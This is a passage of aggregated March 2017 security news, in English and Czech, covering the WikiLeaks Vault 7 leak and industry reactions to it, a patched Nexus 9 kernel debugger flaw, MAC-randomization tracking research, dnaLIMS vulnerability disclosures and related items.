"This disclosure should include detailed notification about the vulnerability, recommendations for patching and a proposed timeline for patch deployment. This level of transparency keeps the interests of all parties in mind. Simply mass stock-pilling all vulnerabilities or disclosing all vulnerabilities on a macro level leaves too many potential gaps. Vulnerabilities need to be handled like weapons and how communication about these weapons occurs is critical to security."
RAND's conclusions on the implications of its study 'for defense and offense' are no more reassuring for business. It makes no comment on whether government should automatically disclose the vulnerabilities it finds, but instead says business should improve its general defensive posture. "Defenders likely need better options to both find zero-day vulnerabilities and detect when a system or software package is being exploited. In addition, rather than focusing only on finding zero-day vulnerabilities, defenders may be able to shift the balance in their favor by starting from the assumption of compromise, investigating ways to improve system architecture design to contain the impact of compromise, and adopting different techniques to identify vulnerabilities."
In other words, RAND's advice is standard contemporary advice: business should move to an incident response security posture; and simply accept that government will have and maintain its own stockpile of zero-days.
It may also be worth noting that the WikiLeaks disclosures probably come nowhere near the CIA's actual stockpile. If we assume that RAND got its dataset from the US government, then RAND says that as of March 1, 2017, the majority of the vulnerabilities were unknown. Industry response to the WikiLeaks disclosures, however, suggests that the majority of the vulnerabilities are old and already patched. The two datasets appear at this stage to be completely different.
Industry Reactions to CIA Hacking Tools: Feedback Friday
11.3.2017 securityweek BigBrothers
WikiLeaks this week released information on what it claims to be a trove of CIA hacking tools. The documents made public appear to show that the intelligence agency has had the tools and capabilities to hack a wide range of systems, including mobile devices, routers, TVs and even cars.
An initial analysis conducted by tech companies, including security firms, showed that a majority of the disclosed vulnerabilities have already been patched by vendors.
Industry reactions to CIA hacking tools
WikiLeaks initially refused to release any of the actual tools and exploits, but it has now promised to share more information with tech firms in an effort to help them protect their customers. However, the White House warned that there could be legal repercussions considering that the information is classified.
The CIA has not made any comments on the authenticity of the leak, which have been dubbed “Vault 7,” but the agency pointed out that it’s legally prohibited from spying on individuals in the United States.
Contacted by SecurityWeek, industry professionals shared some thoughts on the Vault 7 leak and its implications.
And the feedback begins…
Ilia Kolochenko, CEO, High-Tech Bridge:
"I am bit surprised that this particular incident has attracted so much attention. The CIA, like any other governmental intelligence agency, uses and will continue using various hacking tools and techniques to obtain any information they need to protect the country. This is their duty. So far, we don't have any evidence that these capacities were used unlawfully, for example to violate reasonable expectation of privacy of innocent US citizens or for illicit interference with elections.
It's also at least incorrect to speak about the CIA's inability to defend itself, as the source of the leak remains unknown. This can be an insider incident, against which - no large companies or governmental agencies are protected in any country. It can also be a honeypot - to distract someone's attention from the real arsenal of the US cyber warfare. I am pretty confident that US intelligence have much bigger technical resources than the garbage exposed in the leak.
Also, intelligence agencies cooperate in many areas, including cybersecurity and cyber warfare. Therefore, the CIA's collaboration and knowledge sharing with other agencies, such as the MI5, is obvious and is a common practice."
Tom Kellermann, CEO, Strategic Cyber Ventures (SCV):
“These exploits and attack platforms allow for an actor to become telepathic. It is quite obvious that this was an act of tradecraft by a foreign power to discredit the US government and to endow dangerous attacks capabilities to the cybercriminal community. The blatant pillaging of the US cyber armory will result in a dramatic escalation of the cyber-insurgency which is raging in US cyberspace. These cyber weapons will be used by the Russian cyber militias against NATO and Western targets. Wikileaks has expanded her arms bazaar and is now distributing digital grenade launchers and uzis to the malcontents and anti-American non-state actors of the world. Cyberspace is about to become a free fire zone.”
Rick Hanson, EVP, Skyport Systems:
“This is just another clear example where an organization that conducts breaches and leaks can not be praised under ANY circumstance. Donald Trump previously praised Wikileaks during his campaign. When an organization like WikiLeaks is lauded in any forum there is reason to be concerned. The fact that Wikileaks claims to have critical CIA information should put our intel community on record.
The protection of sensitive tools and data by our intel community should be a top priority. If this leak turns out to be a reality, our governmental cybersecurity policy and implementation needs to be called into question. A key reason our intel community needs to operate only on"Zero Trust" systems with a hardware root of trust."
Ayal Yogev, VP of Product Management, SafeBreach:
“Any type of device you add to the network can be used by an attacker. This isn't new, but the information shared by Wikileaks about SmartTVs reinforces this. Additionally, while most may consider this a consumer-focused issue, in fact, SmartTVs are used by many enterprises in conference rooms and common areas. Imagine the types of executive level conversations an attacker might be privy to.
These new IoT devices are prime targets for an attacker since in many cases they are less protected than existing devices on the network and an attacker always looks for the weakest link. This is why knowing exactly what can be done from any point in your environment by a hacker is crucial. Understanding the kill chain can help enterprises prevent attacks, for example - a SmartTV may be hacked, but because there is no way to exfiltrate information from the segment the TV is in, you're breaking the kill chain, and containing the problem.”
Alex Rice, CTO, HackerOne:
"Vulnerabilities are difficult to keep as a secret, and this news break shows they don’t remain secret for long. The longer these vulnerabilities remain unpatched, the more dangerous they become because they can fall into criminal hands. The CIA put consumers at risk by not reporting these bugs to their vendors. Similarly, Wikileaks is no better at keeping secrets than the CIA and should immediately disclose any known vulnerabilities to the appropriate vendors so they can be fixed.
If there is a known vulnerability and it is not making it into the hands of the vendor so it can be resolved, something is broken. Companies and consumers should encourage the active disclosure of vulnerabilities no matter their source, this includes security researchers, active security teams, and the U.S. government. At minimum, this means a thorough review of the U.S. Government's Vulnerabilities Equities Process, which appears to have not been honored. This ultimately strains tech companies relationship with the US government. The economy relies significantly on the trust of its consumers and if consumers can’t trust U.S. made tech products, this harms competitiveness in the market."
Mikko Hypponen, Chief Research Officer, F-Secure:
“It’s no surprise that the CIA is using these hacking techniques. What is unsuspected is the leak, and it’s huge. So the question is who leaked it to Wikileaks? The Russians, an insider? We don’t know the answer. Another question we need to ask us, why was it leaked now? We don’t know this either.
In countries like the US, the Intelligence Agency’s mission is to keep the citizens of their country safe. The Vault7 leak proves that the CIA had knowledge of iPhone vulnerabilities. However, instead of informing Apple, the CIA decided to keep it secret. So the leak tells us a bit about how the CIA decided to use its knowledge: it considered it more important to keep everybody unsecure than protecting its citizens from the vulnerability, and maybe use the vulnerability for its own purposes or counter terrorism purposes.”
Nathan Wenzler, chief security strategist, AsTech:
“Could this be the age of the EULA? There have been many reports and lawsuits in recent months (Visio and Samsung come immediately to mind) of devices such as televisions recording information and potentially providing it to "third parties." Is it really any surprise to the security industry that these third parties might include government agencies such as the CIA? Where backdoors exist, there is often language present in the EULA that would suggest that the manufacturer may capture and share information.
We certainly want to believe that companies operate to the highest standards of protecting user's privacy, but there have simply been too many cases where intelligence agencies have publicly attempted to gain this sort of backdoor access through legal channels (FBI vs. Apple, anyone?) to think that no company is cooperating with these authorities. It may be time to make a serious review of licensing agreements and terms of service a standard part of our security programs, rather than the standard de facto process of blindly clicking "OK" at the bottom of the page. This doesn't necessarily make it right, moral or ethical, but, the writing has been on the wall the whole time, and these recent revelations should not come as a surprise, but rather serve as confirmation of what we have always believed was happening.”
Sanjay Kalra, Co-founder and Chief Product Officer, Lacework:
“There has been a lot of focus on the CIA leaks around exploits for Smart TV’s, connected vehicles and lot of new gadgetry. If you look closely at the list of projects, the majority of them were focused on Unix. The Unix systems are considered to be extremely safe, however, the CIA had tools to do keyboard logging, copy network traffic and intercept secure connections to Unix machines. Unix runs and stores the crown jewels in data center/cloud for most of the enterprises today and exploiting them is a gold mine. Enterprises need to first focus on security their core with breach detection and insider threat detection before looking to secure the next shiny object. Compromise to core can be disastrous.”
Chris Roberts, Chief Security Architect, Acalvio:
“One thing that is interesting is the mass of mis-directed social media indignation and ill-informed discussions about who’s been hacking where, what and when. The open library of “wild” code that is being attributed to various CIA branches is nothing more than data collected freely available on the Internet, therefore attributing hacks to the CIA because of the code fingerprints is woefully incorrect. That’s damaging both from a community not doing its research and the Intelligence community which is sitting there battered and bruised because of these loses AND now taking the heat for attacks it’s not likely done (Trump, DNC etc.)
The biggest issue is ‘we know’ most of what’s been disclosed, including hacks, code and covert operation styles. We also know what the tactics are. Heck, most of us use the very same tactical operations when engaged by clients or doing R&D. The code library is NICE to have in one place. But again, most of us have multiple snippets of various code bases.
What needs to happen now is that the intelligence community must stand up and simply say “yep, that’s us. We are at war in the electronic realm. Suck it up."
Willis McDonald, Senior Threat Manager, Core Security:
"The leaked CIA documents have potentially disastrous effects on ongoing CIA operations. If the tools detailed in the documents are still in use this now gives clues to targeted organizations as to what is of interest to the CIA. As a consequence this could also expose close contact human intelligence (HUMINT) operations leading to incarceration and possible harm to operatives.
The leak of these documents definitely has caused financial harm to the CIA. Response to the leak of the documents will require a massive research and retooling effort in the CIA. Everything from tradecraft to tools will need to be changed in order for operations to continue undetected which will cost millions of dollars and months of training and development."
Ajay Arora, CEO and Co-founder, Vera:
"If these docs prove to be authentic, everyone should once and for all throw out their blind trust that that their devices, apps or data is ever safe or private. People need to wake-up to the fact that they need to take responsibility for maintaining the privacy of their information and make no assumptions. At the end of the day, no one has your best interests in mind but you -- people can't even trust their own government any more. This is the tragic new normal we have to all unfortunately accept."
Apostolos Giannakidis, Lead Security Architect, Waratek:
"The Wikileaks release of the CIA's Vault 7 hacker tools is a dream come true for hackers and a nightmare for corporate security teams who are already under-resourced and over-stressed just trying to keep up with known threats, especially in application software.
This event highlights the risk of introducing new software code into an enterprise environment, especially from third-parties. Blindly putting unrestricted trust in software can greatly increase the risk of introducing new vulnerabilities and even hidden backdoors.
There are tools that can automate the process of identifying and increasing protection against these threats, but the attacks are likely to come faster than the defenders can implement them. It will take security teams weeks, months or even years to develop patches to address the exploits about to be unleashed into the mainstream over time.”
Gunter Ollmann, CSO, Vectra Networks:
“The CIA’s “UMBRAGE” program reveals the importance placed upon “false flag” signatures used in clandestine operations. It should be no surprise to the InfoSec community that such resources are expended to capture and duplicate the techniques used by foreign agencies and criminal organizations. It does however reinforce that the use of such techniques are, in fact, an everyday part of clandestine operational procedure – casting further doubt on public attribution disclosures – especially those quickly released and promoted by the marketing teams of commercial security vendors.”
Brian Vecci, Technical Evangelist, Varonis:
“It’s too easy for data to be stolen, even—allegedly—within the CIA’s Center for Cyber Intelligence. The entire concept of a spook is to be covert and undetectable; apparently that also applies to actions on their own network. According to WikiLeaks, this treasure trove of files was given to them by a former U.S. government contractor. The CIA is not immune to issues affecting many organizations: too much access with too little oversight and detective controls.
In performing forensics on the actual breach, the important examination is to determine how 8,761 files just walked out of one of the most secretive and confidential organizations in the world. Files that were once useful in their operations are suddenly lethal to those same operations. We call this toxic data, anything that is useful and valuable to an organization but once stole and made public turns toxic to its bottom line and reputation. All you have to do is look at Sony, Mossack Fonseca and the DNC to see the effects of this toxic data conversion.”
Philip Lieberman, President, Lieberman Software:
“Presidential Directive 20 and Title 10 provide transparency to the strategy and resources of the US Government regarding methods and technologies used for national security purposes. The creation, capabilities and usage of cyber weapons is controlled by the Senate, Congress and President in a coordinated process governed by law. The agencies themselves do not operate independently or autonomously without first receiving detailed authorization and direction from national leadership and is vetted by the judicial branch.
Questions as to the capabilities and usage of those capabilities should be directed to the Senate and President directly rather than the agencies themselves as they simply carry out operations directed from above them.
The appropriateness and usage of capabilities is a matter of politics and national security that may or may not disturb citizens. My advice is to contact your representative in Congress and the Senate and ask them for an explanation as to why and how these capabilities are used.”
Google Protects Nexus from Malicious Headphones
11.3.2017 securityweek Virus
One of the issues that Google addressed earlier this week with the release of a new set of security patches for Android could render Nexus 9 devices vulnerable to malicious headphones, a team of security researchers reveals.
Tracked as CVE-2017-0510 and rated Critical severity, the security flaw is described as an elevation of privilege vulnerability in the kernel FIQ debugger that “could enable a local malicious application to execute arbitrary code within the context of the kernel.” The issue could lead to a local permanent device compromise, thus forcing users to reflash the operating system to repair the device.
The bug was found by Aleph Research, a team of ex-IBM X-Force researchers. Despite the unusual attack vector, the team was able to leak stack canaries, derandomize ASLR (address space layout randomization), conduct a factory reset, and even access HBOOT, which allowed them to communicate with internal System-on-Chips (SoCs).
In a blog post authored by Roee Hay, Aleph Research explains that attacks via multiplexed connectors were initially detailed in a BlackHat 2013 paper that focused mainly on USB ports and only briefly mentioned audio connectors. At the time, Nexus 4 was found to include a “TTL UART interface hidden in its headphone jack, a functionality which is enabled if the voltage on the MIC pin exceeds some threshold,” with all Nexus devices (Pixel too) known to have the functionality nowadays.
The researchers discovered that FIQ (Fast Interrupt Request) Debugger could be accessed on Nexus 9, although without a shell on production builds. Hay notes that “FIQ Debugger functionality is enabled even if the UART cable is inserted when the platform is up,” and explains that the supported commands allow for the exfiltration of a lot information by interacting with FIQ Debugger.
An attacker, Hay reveals, could dump the process list and can use the console command to view the kernel log and receive an unprivileged shell (on userdebug, eng builds only), or can dump the registers and call stack too.
“Unlike a normal debugger we cannot modify memory and/or place breakpoints, however since the FIQ preempts, the dumped information will be of an arbitrary process,” Hay explains.
The team then focused on discovering whether the attack vector could be used to leak sensitive information, and eventually succeeded in leaking the Stack Canary value of the Zygote process. Zygote is a process that contains system libraries and frameworks that almost all apps use, and which is shared between all Android apps (malware such as Triada was observed abusing Zygote to infect all processes).
The researchers were also able to prove that the attack can significantly weaken ASLR, because the vulnerability allows an attacker to view arbitrary CPU contexts with addresses included.
Next, they attempted to move beyond the limitation of the FIQ Debugger prompt, and were able to force a reboot to HBOOT from it, by entering the reboot oem-42 command. This boot mode allows an attacker to interact with I2C accessible SoCs, the researchers discovered. A factory reset could also be triggered, Hay notes.
“Google has patched the vulnerability by reducing the capabilities of the FIQ Debugger. When the platform is up, it’s no longer possible dump the registers nor reboot with an oem-N parameter (preventing reboots into HBOOT and Factory Resets). Issuing reboot oem-42 now results in a normal reboot,” the researcher concludes.
Cyber Attack Simulation Startup Cymulate Raises $3 Million
11.3.2017 securityweek Cyber
Cymulate Raises $3 Million in Series A Funding to Expand Cyber Attack Simulation Business
Israel-based cybersecurity startup Cymulate announced on Friday that it has raised $3 million through a Series A round of financing led by investment firm Susquehanna Growth Equity.
Founded by Eyal Wachsman and Avihai Bar Yosef, the Israel-based company offers a cloud-based cyber attack simulation platform that helps organizations assess the security of various systems, such as email, Windows Domain Network configurations, web servers, web traffic, and more.
“Through a game-changing combination of offensive/defensive security and SaaS platform, Cymulate helps organizations expose critical vulnerabilities in their security infrastructure before an actual attack take place,” the company explains.
Customers can run a one-time security assessment for $9,999, with other plans available for enterprise customers and service providers.
Absolutní soukromí neexistuje, tvrdí ředitel FBI
10.3.2017 Novinky/Bezpečnost BigBrother
Naprosté soukromí v USA neexistuje, míní současný ředitel Federálního vyšetřovacího úřadu (FBI) James Comey. „Ani naše vzpomínky nejsou v Americe absolutně soukromé,“ uvedl na půdě soukromé univerzity Boston College během konference na téma kybernetické bezpečnosti, informovala CNN.
Nedešifroval svůj disk, a tak skončil ve vězení. Už tam sedí 16 měsíců a pořád nechce sdělit heslo
Svá slova vysvětluje tím, že vždy existuje možnost, kdy bude osoba vyzvána, aby soudu svěřila důvěrné informace ze svého života, byť v tomto směru jsou určitá omezení. „Nicméně základní princip je ten, který jsme v této zemi vždy akceptovali, a to že v Americe neexistuje absolutní soukromí,“ řekl šéf FBI.
Prohlášení přišla v době, kdy nejen technologickým světem rezonuje kauza zveřejnění údajných tajných dokumentů CIA, které poodhalily široké spektrum nástrojů a technik používaných tajnou službou ke sledování prostřednictvím internetu.
Wikileaks zveřejnilo údajné dokumenty CIA, které popisují hackerské operace
Comeyho trápí aktuální trend zabezpečování komunikačních aplikací, ale i zařízení samotných. FBI to totiž výrazně ztěžuje práci. Pro ilustraci: FBI získala za poslední čtyři měsíce uplynulého roku jako součást vyšetřování přístup k 2 800 zařízením. Dostala se však pouze do 1 200 z nich.
Šéf agentury si myslí, že určité nezbytné kompromisy v oblasti soukromí v rámci zvýšení bezpečnosti by tolerovali i takzvaní Otcové zakladatelé - státníci, kteří se svého času přičinili o vznik Spojených států.
Špehuje nás CIA?
10.3.2017 SecurityWorld BigBrother
Aktuální kauza Wikileaks vs CIA plní přední stránky světových médií a na mysl se vkrádá logická otázka. Máme se bát o své soukromí?
Zpravodajská agentura samozřejmě čelí kritice.
„Neměla by namísto špehování občanů a prolamování bezpečnostních opatření chytrých zařízení raději spolupracovat s výrobci na jejich zdokonalování?“ ptají se jedni.
„Pokud by agentura, která se snaží chránit naši bezpečnost a odhalovat zločince, nevyužívala všechny prostředky k odposlouchávání druhých, nedělala by svou práci,“ namítají druzí s tím, že veřejnost by měla být zveřejněnými dokumenty namísto znepokojení „povzbuzena“.
„Většina z nich se týká konkrétních cílů. Nejde tu o masové špehování a shromažďování dat za účelem hledání jehly v kupce sena,“ podotýká v rozhovoru pro BBC Alan Woodward, bezpečnostní poradce Europolu. „Navíc k tomu potřebují povolení soudu, nemůžou napíchnout jen tak ledajaký telefon. Jeden z důvodů, proč lidi důvěřují bezpečnostním službám, je ten, že dodržují zákon. A když ne, tak se to provalí. Jestliže se Wikileaks dostalo ke kódům, s jakými CIA pracovala, je jejich zodpovědností nezveřejňovat je, protože v opačném případě by je zpřístupnili rovněž kriminálníkům a běžní občané by se ocitli v ohrožení. CIA měla důvod, proč je tajit.“
Olej do ohně přilil i známý whistleblower Edward Snowden, který na svůj twitterový účel napsal následující: „Představte si svět, ve kterém CIA přemýšlí nad tím, jak vás špehovat skrz televizi. To je svět, ve kterém dnes žijeme.“ (Férově se hodí dodat, že metody špehování skrz chytré televize popsané v uniklých dokumentech vyžadují připojení externího zařízení, tedy faktické vniknutí do domácnosti dotyčného.)
„Ty zprávy ukazují, že americká vláda vytváří tato zranitelná místa v amerických výrobcích a úmyslně je nechává otevřená. A proč je to nebezpečné? Protože dokud nebudou zavřená, kterýkoliv hacker může těchto míst, která CIA nechala otevřená, zneužít a dostat se do kteréhokoliv iPhonu na světě,“ píše dále Snowden.
Woodward oponuje: „Bavíme se tu o CIA, ne o bezpečnostní agentuře. Jestli o těch slabinách vědí, tak je využijí. Jejich spravování je na jiných.“
Obávat se tedy, nebo neobávat o narušení soukromí? Pro zpravodajskou agenturu by hromadné špehování veřejnosti nejspíš nedávalo příliš smysl a hlavně by s největší pravděpodobností bylo neproveditelné – jak z pohledu financí tak požadavků na lidský kapitál. Mike McLellan, bývalý pracovník britské vlády pro kyberbezpečnost, však v této souvislosti upozorňuje na ještě jeden znepokojivý fakt, a totiž, že podobné mezery v softwaru vyhledávají i soukromé firmy a následně je prodají komukoliv, kdo nabídne nejvyšší cenu.
V budoucnu navíc špehování většího rozsahu může usnadnit rozvoj umělé inteligence, která by mohla snáz a rychleji rozpoznávat relevanci sledovaných dat.
Don Smith z bezpečnostní firmy SecureWorks však alespoň částečně uklidňuje: „Je to jen jedno z mnoha rizik, které nás v budoucnu s rozvojem technologií čekají. Jen si představte to množství dat, která by musela být zpracována. Není možné nahrávat každý telefon na světě, natož pak každý telefonát. Jestliže tedy nejste v centru jejich zájmu, nemají na vás kapacitu.“
USB firewall vás ochrání před škodlivým zařízením
10.3.2017 Root.cz Zabezpečení
Pokud to myslíte s bezpečností opravdu vážně, měli byste zvážit stavbu nebo nákup USB firewallu. Malé zařízení pracuje mezi počítačem a elektronikou, kterou chcete připojit do USB.
Váš počítač za normálních okolností přijme každé zařízení, které připojíte do USB. V mnoha případech je to v pořádku, protože uživatel chce prostě zapojit a používat. Čím dál častěji se ale hovoří o nových způsobech útoku s využitím hardware. Zatímco proti softwarovým útokům se lze bránit vhodným nastavením systému, nasazením bezpečnostních modulů (LSM) nebo třeba antivirem (na některých platformách), proti zlému hardware se brání jen těžko.
Upravený hardware může zaútočit na chybu v ovladačích nebo se může vydávat za jiné zařízení, než jakým ve skutečnosti je. Nic mu pak nebrání v systému sbírat data, nainstalovat do něj další aplikace nebo se třeba vydávat za síťovou kartu a přesměrovat přes sebe veškerý provoz. Dříve se k podobným účelům používala upravená zařízení s přidanou elektronikou, dnes stačí upravit firmware ve flash disku a vytvořit z něj útočné zařízení.
Vypadá to jako pevný disk, ale uvnitř je flash disk a malý počítač se zlým plánem
Problém je, že takové chování nedokáže zachytit žádná aplikace v systému. Příkazy ze zařízení jsou odchytávány a prováděny přímo ovladačem a operačním systémem a software uvnitř nemá o škodlivé činnosti zvenčí ponětí, pokud neimplementujete například USBGuard.
Vývojář Robert Fisk přišel se zajímavým a univerzálním řešením: USB firewall s názvem USG (G jako Good, místo B jako Bad). Jde o hardware, který připojíte mezi počítač a potenciálně nebezpečné zařízení. Tím dojde k izolaci obou stran, přičemž vložený firewall propouští jen bezpečné příkazy a data.
Schéma použití USG
Uvnitř zařízení jsou dva procesory STM32F4, které jsou zvenčí připojené k USB a mezi sebou jsou propojené pomocí vysokorychlostní sběrnice SPI. První verze USG používá 12Mbits hardware, pokud přes něj připojíte flash disk, budete s ním komunikovat rychlostí okolo 1MB/s. Podle autora je možné vyrobit i vysokorychlostní hardware, ale jeho vývoj bude stát nemalé peníze.
Procesor blíže k počítači pak přijímá jen velmi omezenou sadu USB příkazů, takže případný útok nebude úspěšný. Chráněny jsou obě strany, použitý flash disk nedokáže zaútočit na počítač a stejně tak cizí počítač nedokáže upravit firmware ve vašem flash disku.
Skutečný vzhled USG
USG zvyšuje bezpečnost také tím, že dovoluje připojit vždy jen jedno zařízení. To sice znemožňuje používat nejrůznější USB huby nebo dockovací stanice, ale brání to v použití podvodných zařízení, která v sobě mohou ukrývat více funkcí – třeba klávesnici s integrovaným flash diskem.
Zároveň není možné, aby zařízení za běhu změnilo své označení. To je způsob, jakým se může upravený flash disk na chvíli prohlásit za klávesnici, provést sadu útočných příkazů a zase se vrátit ke své původní funkci. USG takovým metamorfózám brání a připojené zařízení tak nemůže změnit svou funkci, dokud není odpojeno a znovu připojeno napájení.
Kvůli omezené sadě příkazů je také omezený seznam zařízení, která budou za USG fungovat. V tuto chvíli autor uvádí flash disky (mass storage), klávesnice a myši. Další verze firmware by pak mohly přidávat další typy zařízení, pokud to bude potřeba.
Samozřejmě i legitimně vypadající zařízení může provádět nebezpečné akce, proto je možné pro konkrétní přístroje přidávat pravidla omezující jejich činnost. Například klávesnice by neměla být schopná posílat znaky o mnoho rychleji, než je schopen člověk psát. Autor na těchto pokročilých pravidlech zatím pracuje.
USB firewall zabalený a připravený
Pokud vás toto zařízení zaujalo, pak vězte, že jde o otevřený hardware s otevřeným firmwarem. Podrobnosti naleznete na GitHubu, kde autor nabízí také možnost objednání USG za přibližně 60 dolarů, tedy asi 1500 Kč.
Avast: Dokumenty na WikiLeaks neobsahují bezpečnostní mezery
10.3.2017 Novinky/Bezpečnost Zabezpečení
Zveřejněné dokumenty serveru WikiLeaks neodhalují v české firmě Avast žádné bezpečnostní mezery, navíc jsou dva roky staré. Řekl to viceprezident Avastu Sinan Eren v reakci na informaci, že Avast figuruje v dokumentech WikiLeaks jako jeden z prodejců bezpečnostního softwaru, na který se zaměřila americká Ústřední zpravodajská služba (CIA).
Portál WikiLeaks zveřejnil kolem 8000 stran dokumentů o útočném programovém arzenálu CIA, s nímž největší americká výzvědná organizace může pronikat do mobilních telefonů, chytrých televizorů a dalších elektronických zařízení a využít je ke shromažďování informací.
„Avast je zmíněn ve zveřejněných dokumentech, stejně jako další globální bezpečnostní firmy. Nicméně zveřejněné dokumenty neodhalují v Avastu žádné bezpečnostní mezery. Jde navíc o veřejně dostupné dokumenty a prezentace z konferencí, které jsou dva roky staré," uvedl Eren.
Dokumenty mají dostatek technických podrobností
Důvody zájmu CIA o Avast, který je jedním z největších dodavatelů bezpečnostního softwaru na světě, mohou být podle bezpečnostního experta sdružení CZ.NIC Pavla Bašty dva. „Avast dodává bezpečnostní řešení, která používají stovky miliónů uživatelů na celém světě, a z pohledu CIA může být zajímavé, pokud by dokázala tato bezpečnostní řešení ošálit tak, aby nepoznala škodlivý software vytvořený CIA a zároveň dál uživatele informovala o jiných nákazách," řekl.
„Druhým faktorem může být, že stejně jako jakýkoliv jiný hojně rozšířený software by mohly produkty společnosti Avast posloužit k šíření škodlivých programů, pokud by se CIA podařilo v těchto produktech najít vhodnou zneužitelnou chybu," dodal.
Publikované dokumenty podle agentury Reuters obsahují dostatek technických podrobností, aby bezpečnostní experti a prodejci ochranného softwaru pochopili, jak rozsáhlé bezpečnostní mezery existují. Poskytují ale málo detailů, které by mohly napomoci rychlé nápravě.
Společnost Avast, založená v roce 1988, se zabývá tvorbou bezpečnostního softwaru a její antivirové programy chrání přes 400 miliónů počítačů a mobilních zařízení ve světě. Loni koupila konkurenční českou firmu AVG.
MAC Randomization Flaws Expose Phones to Tracking
10.3.2017 securityweek Mobil
Researchers have disclosed a new attack method that can be leveraged to track mobile devices that rely on Media Access Control (MAC) address randomization to protect users’ privacy.
A MAC address is a unique identifier assigned to a device’s network interfaces. Since the address is unique and hardcoded, it can be very useful for tracking a device and its owner. In order to protect users against MAC-based tracking attempts, mobile device vendors have implemented MAC address randomization, which involves broadcasting a random Wi-Fi MAC address.
Experts have been working on demonstrating that MAC address randomization can be defeated and now, building on previous research, a team from the U.S. Naval Academy has come up with a technique that can be used to track all smartphones that rely on this feature.
Google introduced MAC address randomization to Android in 2015 with the release of Android 6 Marshmallow. However, researchers discovered that many device manufacturers that use Android, including Samsung, have not enabled MAC address randomization.
Apple introduced the feature in mid-2014 with the release of iOS 8, but experts found that iOS 10 makes it easy to identify and track devices regardless of their use of MAC address randomization.
U.S. Naval Academy researchers identified serious flaws in a majority of the Android implementations of MAC randomization, allowing them to break the protection in the case of roughly 96 percent of tested phones.
Researchers also analyzed so-called Karma attacks, a known method that involves simulating an access point that a device prefers to connect to. They also devised a new method that relies on control frames to expose the global MAC address for all types of devices, regardless of the operating system, manufacturer or the way randomization is implemented.
The new attack involves Request-to-Send (RTS) and Clear-to-Send (CTS) frames, which are used to avoid collisions in the IEEE 802.11 specification (i.e. Wi-Fi). When a node wants to send data, an RTS frame is transmitted to inform other nodes on the channel that the channel should not be used in order to avoid collisions. The target node responds with a CTS frame if the request to transmit data is approved.
By sending an RTS frame to IEEE 802.11 client devices, an attacker obtains a CTS response from which they can derive the global MAC address. Once the global MAC has been obtained, the attacker can easily track that device in the future by sending it RTS frames containing the global MAC.
Researchers said this attack method worked on all the devices they tested, including iPhone 5s, iPhone 6s, iPad Air, Google Pixel, LG Nexus 5X, LG G4 and G5, Motorola Nexus 6, Moto Z Play and OnePlus 3.
Since a wide range of devices are vulnerable to this attack, experts believe RTS/CTS responses are a function of the underlying 802.11 chipset, not the operating system. This would mean that the derandomization issue cannot be patched by smartphone manufacturers with an OS update.
“There are multiple scenarios in which a motivated attacker could use this method to violate the privacy of an unsuspecting user. If the global MAC address for a user is ever known, it can then be added to a database for future tracking,” researchers said in their paper. “Conceivably, an adversary with a sufficiently large database and advanced transmission capabilities could render randomization protections moot.”
Furthermore, the experts believe randomization can be truly effective only if it’s universally adopted.
“We propose the following best practices for MAC address randomization. Firstly, mandate a universal randomization policy to be used across the spectra of 802.11 client devices. We have illustrated that when vendors implement unique MAC address randomization schemes it becomes easier to identify and track those devices. A universal policy must include at minimum, rules for randomized MAC address byte structure, 802.11 IE usage, and sequence number behavior,” they added.
Critical Vulnerabilities Found in Popular DNA Sequencing Software
10.3.2017 securityweek Vulnerebility
dnaLIMS DNA Sequencing Software Vulnerabilities
Multiple Vulnerabilities in dnaLIMS Disclosed After Vendor Failed to Engage with Security Researchers
Multiple vulnerabilities exist in dnaLIMS, a web based laboratory information management system that provides scientists and researches with tools for processing and managing DNA sequencing requests. dnaLIMS, developed and sold by dnaTools, is used by academia, business and government; and is found in many US universities. The vulnerabilities are described as critical.
They were discovered in Q4 2016 by boutique security firm Shorebreak Security, and were reported to the vendor on Nov. 6. Shorebreak had been commissioned by a hospital user of dnaLIMS to perform a blackbox penetration test of the product. Users of dnaLIMS should note that at the time of writing this, the vulnerabilities have not been patched and are publicly known. For now, users should restrict access to authorized hosts only and make sure that the product cannot be accessed from the public internet; although in university environments that will still leave potential access to many thousands of students and academic researchers.
Shorebreak attempted to follow 'responsible disclosure' guidelines and reported seven serious vulnerabilities privately to the vendor. After four months of trying to engage with the vendor, it publicly disclosed the vulnerabilities in an advisory published this week. "Researchers cannot keep quiet about vulnerabilities indefinitely," Shorebreak CEO Mark Wolfgang told SecurityWeek. "If we can find these problems, so can hackers -- and dnaLIMS users need to be aware of the issues."
The vulnerabilities include an improperly protected web shell, unauthenticated directory traversal, insecure password storage, session hijacking, multiple cross-site scripting, and improperly protected content.
"An unauthenticated attacker," warns the advisory, "has the ability to execute system commands in the context of the web server process, hijack active user sessions, retrieve system files (including the plaintext password file), and inject untrusted html or JavaScript into the dnaLIMS application. An attacker could use these vulnerabilities together in order to gain control of the application as well as the operating system hosting the dnaLIMS software. If this software is being hosted publicly or in a DMZ this could act as a pivot point to launch further attacks or move laterally into trusted network(s)."
Wolfgang described his frustrations in trying to engage with the vendor. When he asked dnaTools for a PGP key to deliver the details securely, he was told to print them out and send hard copy through the post. "I got the feeling," Wolfgang told SecurityWeek, "they thought or hoped we wouldn't bother." But he did. He did so on Nov. 16, 2016, using USPS Certified Mail. But it wasn't until Dec. 8 that dnaTools acknowledged receipt and suggested that users place the application behind a firewall.
When he asked the vendor if it had a plan to address the vulnerabilities, he received the reply, "Yes, we have a plan. Please gather a DNA sequence, PO Number, or Fund Number and go to your local grocery store and see what it will buy you." The vendor clearly believes that the vulnerabilities cannot lead to meaningful data loss.
SecurityWeek emailed dnaTools requesting its point of view, but received no reply.
Earlier this week, Zenofex of exploiteers disclosed a series of vulnerabilities in Western Digital's My Cloud range of storage devices. Zenofex went straight to full public disclosure because, he told SecurityWeek, he had no confidence "in regards to [the] manufacturer's ability to properly triage and fix vulnerabilities in their code."
With dnaTools, Shorebreak Security attempted to follow responsible disclosure guidelines -- indeed, it exceeded those guidelines by giving the vendor four months to fix the product. But in the end, the result was the same in both cases: full public disclosure with no immediate fix from the vendor.
CIA replies to WikiLeaks Vault7 Leak, it is operating to protect Americans
10.3.2017 securityaffairs BigBrothers
WikiLeaks Vault7 – CIA pointed out that its mission is to “aggressively collect” foreign intelligence from overseas entities.
The U.S. Central Intelligence Agency (CIA) has issued an official statement in response to the Wikileaks Vault7 Data leak.
The US intelligence agency denies conducting a large-scale surveillance on its citizens.
According to an unnamed U.S. officials quoted by the Reuters press agency, that the most likely source of the data leak is a CIA contractor.
